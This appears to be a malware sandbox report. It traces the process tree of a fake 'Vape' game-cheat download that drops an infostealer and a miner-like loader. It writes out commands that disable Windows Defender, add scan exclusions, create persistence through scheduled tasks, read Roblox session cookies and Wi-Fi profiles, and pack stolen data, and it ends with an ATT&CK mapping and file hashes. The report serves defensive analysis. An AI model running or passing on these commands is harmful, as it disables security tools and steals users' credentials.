        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5584 /prefetch:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5800 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,14532138486377433904,13053849822700275969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6448 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
  C:\Users\Admin\Downloads\Vapev41.exe
    "C:\Users\Admin\Downloads\Vapev41.exe"
    - Checks computer location settings
    - Executes dropped EXE

    C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe
      "C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdateCore.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'GoogleUpdateCore.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "GoogleUpdateCore" /tr "C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"
        - Creates scheduled task(s)

    C:\Users\Admin\AppData\Roaming\VapeV4.exe
      "C:\Users\Admin\AppData\Roaming\VapeV4.exe"
      - Checks computer location settings
      - Executes dropped EXE

      C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe
        "C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken

      C:\Users\Admin\AppData\Roaming\Vape Updated.exe
        "C:\Users\Admin\AppData\Roaming\Vape Updated.exe"
        - Checks computer location settings
        - Executes dropped EXE

        C:\Users\Admin\AppData\Roaming\Vape.exe
          "C:\Users\Admin\AppData\Roaming\Vape.exe"
          - Executes dropped EXE

          C:\Users\Admin\AppData\Roaming\Vape.exe
            "C:\Users\Admin\AppData\Roaming\Vape.exe"
            - Executes dropped EXE
            - Loads dropped DLL

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Vape.exe'"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Vape.exe'
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "start bound.exe"

              C:\Users\Admin\AppData\Local\Temp\bound.exe
                bound.exe
                - Executes dropped EXE
                - Adds Run key to start application

                C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c run.bat

                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
                    java -version

                    C:\Windows\system32\icacls.exe
                      C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                      - Modifies file permissions

                  C:\Windows\system32\choice.exe
                    choice /c YN

                  C:\Windows\system32\tar.exe
                    tar -xf oldassets.zip

                  C:\Windows\system32\tar.exe
                    tar -xf newassets.zip

                  C:\Windows\system32\tar.exe
                    tar -xf mappings.zip

                  C:\Windows\system32\PING.EXE
                    ping localhost -n 5.5
                    - Runs ping.exe

                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
                    java --add-opens java.base/java.lang=ALL-UNNAMED -jar vape-loader.jar

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

              C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                - Enumerates processes with tasklist
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

              C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                - Enumerates processes with tasklist
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

              C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

              C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                - Enumerates processes with tasklist
                - Suspicious use of AdjustPrivilegeToken

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"

              C:\Windows\system32\tree.com
                tree /A /F

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

              C:\Windows\system32\netsh.exe
                netsh wlan show profile

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"

              C:\Windows\system32\systeminfo.exe
                systeminfo
                - Gathers system information

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dyyffqnv\dyyffqnv.cmdline"

                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD42.tmp" "c:\Users\Admin\AppData\Local\Temp\dyyffqnv\CSC20686B96C24646458F5571D26EB2435.TMP"

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"

              C:\Windows\system32\tree.com
                tree /A /F

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"

              C:\Windows\system32\tree.com
                tree /A /F

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"

              C:\Windows\system32\tree.com
                tree /A /F

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"

              C:\Windows\system32\tree.com
                tree /A /F

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"

              C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

              C:\Windows\system32\tree.com
                tree /A /F

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "getmac"

              C:\Windows\system32\getmac.exe
                getmac

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3512"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 3512
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2784"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 2784
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4548"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 4548
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4984"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 4984
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3116"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 3116
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1584"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 1584
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1776"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 1776
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1348"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 1348
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5788"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 5788
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5960"

              C:\Windows\system32\taskkill.exe
                taskkill /F /PID 5960
                - Kills process with taskkill

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26722\rar.exe a -r -hp"BlankGrabber492" "C:\Users\Admin\AppData\Local\Temp\VdiKY.zip" *"

              C:\Users\Admin\AppData\Local\Temp\_MEI26722\rar.exe
                C:\Users\Admin\AppData\Local\Temp\_MEI26722\rar.exe a -r -hp"BlankGrabber492" "C:\Users\Admin\AppData\Local\Temp\VdiKY.zip" *
                - Executes dropped EXE

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic os get Caption"

              C:\Windows\System32\Wbem\WMIC.exe
                wmic os get Caption

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

              C:\Windows\System32\Wbem\WMIC.exe
                wmic computersystem get totalphysicalmemory

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

              C:\Windows\System32\Wbem\WMIC.exe
                wmic csproduct get uuid

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

              C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                - Detects videocard installed

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

        C:\Users\Admin\AppData\Roaming\WAlletsd.exe
          "C:\Users\Admin\AppData\Roaming\WAlletsd.exe"
          - Suspicious use of NtCreateUserProcessOtherParentProcess
          - Drops file in Drivers directory
          - Executes dropped EXE
          - Drops file in Program Files directory
          - Suspicious behavior: EnumeratesProcesses

        C:\Users\Admin\AppData\Roaming\discord.exe
          "C:\Users\Admin\AppData\Roaming\discord.exe"
          - Checks computer location settings
          - Drops startup file
          - Executes dropped EXE
          - Adds Run key to start application
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\discord.exe'
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'
            - Suspicious behavior: EnumeratesProcesses

            C:\Windows\System32\Conhost.exe
              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\discord.exe'
            - Suspicious behavior: EnumeratesProcesses

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'discord.exe'

          C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "discord" /tr "C:\Users\Admin\AppData\Roaming\discord.exe"
            - Creates scheduled task(s)

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

    C:\Windows\System32\sc.exe
      sc stop UsoSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      sc stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      sc stop wuauserv
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      sc stop bits
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      sc stop dosvc
      - Launches sc.exe

  C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

    C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-ac 0

    C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-dc 0

  C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

  C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\aocmbbfhjple.xml"
    - Creates scheduled task(s)

  C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

  C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

    C:\Windows\System32\sc.exe
      sc stop UsoSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      sc stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      sc stop wuauserv
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      sc stop bits
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      sc stop dosvc
      - Launches sc.exe

  C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

    C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0

    C:\Windows\System32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0

    C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-ac 0

    C:\Windows\System32\powercfg.exe
      powercfg /x -standby-timeout-dc 0

  C:\Windows\System32\schtasks.exe
    C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\aocmbbfhjple.xml"
    - Creates scheduled task(s)

  C:\Windows\System32\conhost.exe
    C:\Windows\System32\conhost.exe

  C:\Windows\explorer.exe
    C:\Windows\explorer.exe

C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe
  C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext

C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe
  C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe
  - Executes dropped EXE

C:\Users\Admin\AppData\Roaming\discord.exe
  C:\Users\Admin\AppData\Roaming\discord.exe
  - Executes dropped EXE
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Create or Modify System Process (1): Windows Service (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Create or Modify System Process (1): Windows Service (1)
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1)
- File and Directory Permissions Modification (1)
- Modify Registry (1)
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\discord.exe.log
  Filesize: 654B
  MD5: 2ff39f6c7249774be85fd60a8f9a245e
  SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
  SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
  SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: e36b219dcae7d32ec82cec3245512f80
  SHA1: 6b2bd46e4f6628d66f7ec4b5c399b8c9115a9466
  SHA256: 16bc6f47bbfbd4e54c3163dafe784486b72d0b78e6ea3593122edb338448a27b
  SHA512: fc539c461d87141a180cf71bb6a636c75517e5e7226e76b71fd64e834dcacc88fcaaa92a9a00999bc0afc4fb93b7304b068000f14653c05ff03dd7baef3f225c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 559ff144c30d6a7102ec298fb7c261c4
  SHA1: badecb08f9a6c849ce5b30c348156b45ac9120b9
  SHA256: 5444032cb994b90287c0262f2fba16f38e339073fd89aa3ab2592dfebc3e6f10
  SHA512: 3a45661fc29e312aa643a12447bffdab83128fe5124077a870090081af6aaa4cf0bd021889ab1df5cd40f44adb055b1394b31313515c2929f714824c89fd0f04

